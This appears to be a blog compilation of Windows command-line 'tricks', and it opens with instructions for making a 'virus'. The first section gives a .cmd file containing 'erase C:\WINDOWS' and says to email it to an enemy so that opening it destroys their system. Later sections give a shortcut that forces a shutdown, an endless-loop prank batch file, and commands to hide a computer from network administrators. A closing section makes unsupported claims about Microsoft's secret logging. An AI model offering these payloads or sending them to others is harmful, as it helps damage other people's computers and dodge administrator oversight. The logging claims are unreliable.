Create virus in 2 min

Hey guys this is d procedure if u want to erase ur enemy's windows.by sending a so called virus(actuallly a cmd)


1.go to notepad type "erase C:\WINDOWS" without qoutes and save d file asfindoutaname.cmd.


2. send dis thru email to any body and wen d person opens dis file .his windows map will be lostwarning: dont run dis file on ur system.
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------:some imporatant tips for computer :-----

1. This link is used to block the site

Write the below sentance in the Command prompt

Syntax:-> notepad c:/windows/system32/drivers/etc/hosts




2. Open the registry

Write the following syntaxinto Command prompt

-> regedit.exe




3 open the gpedit

Write the following syntaxinto Command prompt

-> gpedit.msc



4. To change the administrator password

-> control userpasswords2



5. To open the System32

Write the following syntax into the Command prompt

-->> system32



6. To see the TEMP file

Write the following syntaxinto Command prompt
->> %temp%



7. To open the control pannel through cmd

Write the following syntaxinto Command prompt
->> control



8. To find the ip address of the the any site follow the below step:

-> Go to the command prompt.

-> Type the Run command and Press Enter.

-> And then Type the ping www.yahoo.com or any site.

9. SOme Important command for Ms-Dos:



-> Go to the command prompt.

-> Type the Run command and Press Enter.

-> rd: Remove the Directory.

-> md: Make the Directory.

-> cd: Change the Directory.

-> del: Delete the file.

-> copy: copy one file to the another.

-> ipconfig: To show the ip address.

-> ipconfig /all : To show the all ip address

Make trojan Virus

step:

1.right click and go to new and create shortcut.

2.shutdown -s -t 50 -c "Trojan virus Activated"(Type the location of the them)

3.click next

4.name of file as u wish(Type a name for this shortcut)

5.change icon for virus goto propeties of shortcut and select icon.

6.And Double Click on it.

7.Thanks Dear.

Its Possible

invisible file


1. create a new folder on desktop

2.right click select rename HOLD ALT KEY and PRESS 0160 and release this makes the folder name blank

3. Right click select the properties->customize->change the folder icon to blank if you can find one


virus:->

4. Open notepad and written below syntax:

@echo off
echo your computer found virus
pause


:1
dir/s
goto 1

(you can write sentence more using above code)


5. save as virus.bat

All postsHide Your Computer From Windows Network

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So, if you want to hide your computer from others users or administrators on a network for any reason just follow the easy steps given below.

This method is best used when you are an administrator who doesn't want other people to know you are on the network Or maybe you are a certain someone like me who doesn't want the administrator to know you are on the network.

First method to hide from windows network Using Command line (very easy)

Open command prompt (start->Run, type CMD if your using windows XP/2K/Vista)

Enter the following command:

net config server /hidden:yes

Now your computer is hidden in the windows network.

Second method Using Computer name change (lengthy)

* Right click “My Computer”.Click properties

* Select computer name tab and click “change”.

* Now open character map utility.(Start>Programs>Accessories >System Tools>Character Map)


* Select the character illustrated above by double clicking it, then select copy. you can close Character Map now.

* Now change the name of your computer by a newly copied character by pressing CTRL+P (paste). Click ok and a new window will popup stating that using these characters will prevent other users from seeing your computer unless your network is using the Microsoft DNS Server. Click 'Yes'.

* Restart system. You are now invisible on your windows network.

Get Ur Folder Options Back

1.Go to Run Regedit.

2. Change the values like mentioned below

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoFolderOptions"=dword:0000000


[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]"NoBrowserOptions"=dword:00000000

How to Hide the drives(c:,d:,e:,a:...etc)

1.Go to start->run.Type regedit.

2.Now go to:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.

3.Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

4.Now modify it's value and set it to 3FFFFFF (Hexadecimal).

5.Now restart your computer.

6.So, now when you click on My Computer, no drives will be shown(all gone...).

7.To enable display of drives in My Computer, simply delete this DWORD item that you created.

8.Again restart your computer.You can now see all the drives again. Magic........

Microsoft's Really Hidden Files

I will not be liable for any damage or lost information, whether due to
reader's error, or any other reason.


There are folders on your computer that Microsoft has tried hard to keep
secret. Within these folders you will find two major things: Microsoft
Internet Explorer has been logging all of the sites you have ever visited --
even after you've cleared your history, and Microsoft's Outlook Express has
been logging all of your e-mail correspondence -- even after you've erased
them from your Deleted Items bin. (This also includes all incoming and
outgoing file attachments.) And believe me, that's not even the half of it.

When I say these files are hidden well, I really mean it. If you don't have
any knowledge of DOS then don't plan on finding these files on your own. I
say this because these files/folders won't be displayed in Windows Explorer at
all -- only DOS. (Even after you have enabled Windows Explorer to "view all
files.") And to top it off, the only way to find them in DOS is if you knew
the exact location of them. Basically, what I'm saying is if you didn't know
the files existed then the chances of you running across them is slim to
slimmer.



It's interesting to note that Microsoft does not explain this behavior
adequately at all. Just try searching on microsoft.com.